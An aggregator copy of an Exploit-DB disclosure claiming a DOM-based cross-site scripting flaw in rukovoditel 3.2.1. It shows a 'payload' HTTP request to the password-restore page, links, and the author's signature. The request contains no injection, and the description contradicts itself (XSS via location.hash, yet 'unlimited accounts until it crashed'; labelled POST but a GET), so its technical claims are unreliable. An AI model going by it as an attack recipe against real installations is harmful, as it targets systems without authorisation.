5

[webapps] rukovoditel 3.2.1 - Cross-Site Scripting (XSS)

 1 year ago
source link: https://www.exploit-db.com/exploits/51121
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

rukovoditel 3.2.1 - Cross-Site Scripting (XSS)

EDB-ID:

51121

EDB Verified:

Exploit:

  /  

Platform:

PHP

Date:

2023-03-28

Vulnerable App:

## Title: rukovoditel 3.2.1 - Cross-Site Scripting (XSS)
## Author: nu11secur1ty
## Date: 11.03.2022
## Vendor: https://www.rukovoditel.net/
## Software: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_3.2.1.zip/download
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1

## Description:
The application is vulnerable to DOM-based cross-site scripting
attacks. Data is read from `location.hash` and passed to
`jQuery.parseHTML`.
The attacker can use this vulnerability to create an unlimited number
of accounts on this system until it crashed.

## STATUS: HIGH Vulnerability - CRITICAL

[+] Payload:

```POST
GET /rukovoditel/index.php?module=users/restore_password HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: sid=jf2mf72r2kfakhhnn6evgusrcg;
cookie_test=please_accept_for_session;
app_login_redirect_to=module%3Ddashboard%2F
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/rukovoditel/index.php?module=users/login
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1)

## Proof and Exploit:
[href](https://streamable.com/i1qmfk)

## Time spent
`3:45`

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK